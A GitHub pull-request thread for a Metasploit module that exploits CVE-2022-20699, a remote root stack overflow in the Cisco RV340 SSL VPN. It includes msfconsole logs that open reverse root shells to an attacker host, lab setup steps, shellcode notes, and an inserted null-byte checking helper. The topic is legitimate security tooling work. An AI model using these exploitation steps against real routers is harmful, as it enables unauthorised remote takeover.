
Add sploit for Cisco RV340 SSL VPN - CVE-2022-20699 #16169

Merged
merged 7 commits into from
May 11, 2022

Conversation

pedrib
Contributor

@pedrib pedrib commented Feb 11, 2022

This pull request adds an exploit for CVE-2022-20699, a fully remote root, which is exploitable over the Internet, for the Cisco RV 340 VPN Gateway router. This vulnerability was used in Pwn2Own Austin 2021 and presented at OffensiveCon 2022 by me and @rdomanski.

For more info check our advisory.

Note that we need to use our own shellcode, as Metasploit doesn't have ARMLE encoders for null free shellcode. Or are we wrong? We couldn't find a way!

Anyway, running this module results in a beautiful reverse root shell.

@bcoles bcoles added module needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Feb 11, 2022
@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@gwillcox-r7
Contributor

@pedrib Given it's unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

@jbaines-r7
Contributor

@pedrib Given it's unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

I have one, and planned to test the module out over the weekend.

@pedrib
Contributor Author

pedrib commented Feb 12, 2022

@jbaines-r7 awesome, thank you. We tested it thoroughly on versions 1.0.03.15 to .03.24 and it worked beautifully, but external validation is always good. If you feel adventurous, try firmwares < 1.0.03.15. We tried the very first firmware released in 2017 (1.0.0-something) and that didn't work, but we might have gone too far back. The 1.0.02.-something series might work.

To test the module, do the following:

  • Go to the router admin page via one of the LAN ports, then VPN -> SSL VPN and turn it on for the port you want to connect to (WAN1 or WAN2).
  • Use dnsmasq to provide a DHCP address to the WAN port, or alternatively configure the WAN interface on the router with a fixed IP.
  • Reboot and wait a bit (3 or 4 minutes; it takes a while) so that the router is back online and no lights are blinking.
  • Run the sploit and pwn it!

EDIT: now that I'm thinking, it might be a good idea to add these instructions to the module docs. Those are in the works, although next week I'm a bit busy, might take a while.

@pedrib
Contributor Author

pedrib commented Feb 12, 2022

@gwillcox-r7 @jbaines-r7 you guys don't have ARMLE encoders for shellcode right? Or did I miss something?

EDIT: @timwr told me the ARMLE payloads might be null free already; I have to admit we didn't even think of that. However, we would have to guarantee that they are always null free for any LHOST / LPORT combination.

@pedrib
Contributor Author

pedrib commented Feb 13, 2022

Ran a few tests, Metasploit DOES NOT produce ARMLE null free shellcode, and there are no encoders to do so, hence we need to stick to our own shellcode.

We also realised that this exploit has a bug in a very specific corner case.
It doesn't work for LHOST addresses with a "0" in any of the octets, such as X.0.Y.Z, X.Y.0.Z and X.Y.Z.0 (and combinations of those such as X.0.0.Y, etc.), which are valid non-RFC1918 IP addresses. For any other IP addresses, it should work flawlessly.

We need to modify the shellcode for this specific case, with a trick similar to the one we use to null the AF_INET struct byte (check the shellcode comment I just added); however, bear in mind this will take a while since we're both pretty busy right now.
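Why a zero octet in LHOST is a problem for a null-free payload is easiest to see by packing LPORT and LHOST the way a reverse-shell payload embeds them (2-byte port in network order, then the 4 address octets) and looking for zero bytes. This is an added illustration, not code from the module or from the Metasploit project; it goes slightly beyond the comment above in that it also flags LPORT values below 256, whose high byte packs to zero.

```ruby
require 'ipaddr'

# Name of each byte in the packed (port, IPv4) endpoint, in the order a
# reverse-shell payload embeds them.
ENDPOINT_FIELDS = ['port high byte', 'port low byte',
                   'octet 1', 'octet 2', 'octet 3', 'octet 4'].freeze

# Pack LPORT and LHOST as they appear inside the payload. AF_INET (0x0002) is
# left out on purpose: its high byte is always zero, which is why the module
# nulls that byte at runtime instead of embedding it.
def packed_endpoint(lhost, lport)
  [lport].pack('n') + IPAddr.new(lhost).hton
end

# Offsets of every zero byte in the packed endpoint (empty when none).
def null_offsets(lhost, lport)
  packed = packed_endpoint(lhost, lport)
  packed.bytes.each_index.select { |i| packed.getbyte(i).zero? }
end

# Which fields would introduce a null byte, e.g. ["octet 2", "octet 3"] for
# 10.0.0.2, or ["port high byte"] for LPORT 80.
def null_fields(lhost, lport)
  null_offsets(lhost, lport).map { |i| ENDPOINT_FIELDS[i] }
end

# True when this LHOST/LPORT pair can be embedded in a null-free payload as-is.
def null_free?(lhost, lport)
  null_offsets(lhost, lport).empty?
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample endpoints: the working one from the thread, one with
  # zero octets, and one with a low port number.
  [['192.168.1.114', 4444], ['10.0.0.2', 4444], ['192.168.1.1', 80]].each do |host, port|
    verdict = null_free?(host, port) ? 'null-free' : "nulls in #{null_fields(host, port).join(', ')}"
    puts "#{host}:#{port} -> #{verdict}"
  end
end
```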

@jbaines-r7
Contributor

Validated on 1.0.03.20. Quick and clean, nice exploit ❤️

msf6 > use exploit/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 192.168.1.114
LHOST => 192.168.1.114
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.8:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 10.0.0.8:8443 - 10.0.0.8:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.1:60250 ) at 2022-02-14 06:56:53 -0800

id
uid=0(root) gid=0(root)

I'll be happy to test against a wider range of firmware, if desired, once code reviews have been done and the code is in a state that is more likely to be landed.

@pedrib
Contributor Author

pedrib commented Feb 14, 2022

@jbaines-r7 good to know! Thanks for testing. First let's try and fix that bug with ".0" addresses, once that is done, we'll need to test again a variety of scenarios to check if there's any breakage.

# A null free shellcode is needed, as this memory corruption is done through `strcat()`
#
# SHELLCODE_START:
# // Original shellcode from Azeria's blog
Contributor

Let's make sure we have all attribution requirements included.

Contributor Author

What do you mean?

Contributor

Sorry; I must have missed this response. We wanted to be super specific and make sure that the shellcode was not licensed in a way that would prevent us from having it in the project.

@pedrib
Contributor Author

pedrib commented Feb 17, 2022

hey all, the shellcode is now fixed! It should work flawlessly for IP addresses with 0 in any of the 2nd, 3rd or 4th octets. Please test!

@pedrib
Contributor Author

pedrib commented Mar 6, 2022

hey everyone, I made a major update - turns out we don't need to flush the caches beforehand, so our shellcode just got smaller. I made some better comments on the module, and added the docs. Please test again!

@pedrib
Contributor Author

pedrib commented Mar 7, 2022

we're all green woohoo! ready to merge?

@gwillcox-r7
Contributor

@jbaines-r7 Any chance you can take another look at this given you have a test target? @bwatters-r7 Do the changes look good from your end?

@jbaines-r7
Contributor

Yup! I'll add it to my TODO for this week. I think I'm booked up with writing today :( But tomorrow/Wednesday, I'll work this out again.

@gwillcox-r7 gwillcox-r7 added docs and removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Mar 14, 2022
@jbaines-r7
Contributor

The most recent version doesn't appear to be working for me:

msf6 > use exploits/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.5:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] 10.0.0.5:8443 - 10.0.0.5:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Exploit completed, but no session was created.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > 

10.0.0.5 is the Cisco device on the WAN side and my box (10.0.0.2) should, in theory, be reachable. The version tested was 1.0.03.20.

@pedrib
Contributor Author

pedrib commented Apr 11, 2022

@jbaines-r7 sorry I completely missed this, thought I had responded.
The module has a 40% failure rate, can you please try 10 times and check how many fail?
Note that you don't need to reboot the device each time, the service will respawn after 1 minute or so.

@razoidr

razoidr commented May 11, 2022

Hi, could you please share a date (is there any?) for when the module will be released?

@bcoles
Contributor

bcoles commented May 11, 2022

Hi, could you please share a date (is there any?) for when the module will be released?

There's no ETA. In the interim you can download the module files here:

https://github.com/rapid7/metasploit-framework/pull/16169/files

@jbaines-r7
Contributor

Sorry for the delay @pedrib. @gwillcox-r7 this is working. Below there is output and a video. From my point of view, there are minor code changes that would be good but I don't see any reason to hold this up any longer than I've already held it up 🤷 I'll leave my RV340 running so I can retest anything quickly.

msf6 > use linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.31
RHOST => 10.0.0.31
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.31:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.28
LHOST => 10.0.0.28
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.28:4444 
[*] 10.0.0.31:8443 - 10.0.0.31:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.31:48738 ) at 2022-05-11 06:31:48 -0700

id
uid=0(root) gid=0(root)

https://www.youtube.com/watch?v=w3wh95MndcQ

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label May 11, 2022
…atting. Also update exploit ranking since this exploit doesn't retrieve version information before exploiting and is not 100% reliable so Excellent ranking isn't appropriate
@gwillcox-r7 gwillcox-r7 self-assigned this May 11, 2022
@gwillcox-r7
Contributor

gwillcox-r7 commented May 11, 2022

Will land this once tests pass, thanks for testing this @jbaines-r7! Updates were mainly to reduce the ranking down to GoodRanking since the exploit isn't 100% reliable so ExcellentRanking isn't appropriate, and it doesn't detect the target version so GreatRanking wasn't appropriate either, and to fix up some minor formatting issues in the markdown for the documentation. Also added in the AutoCheck library so we can automatically detect if the target is a likely candidate or not prior to exploiting.

@gwillcox-r7 gwillcox-r7 changed the title Add sploit for Cisco RV340 SSL VPN Add sploit for Cisco RV340 SSL VPN - CVE-2022-20699 May 11, 2022
@gwillcox-r7 gwillcox-r7 merged commit 1c934b8 into rapid7:master May 11, 2022
@gwillcox-r7
Contributor

Release Notes

A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.

@pedrib
Contributor Author

pedrib commented May 11, 2022

Thanks everyone, you're awesome!

@pedrib pedrib deleted the cisco_rv branch May 11, 2022 15:36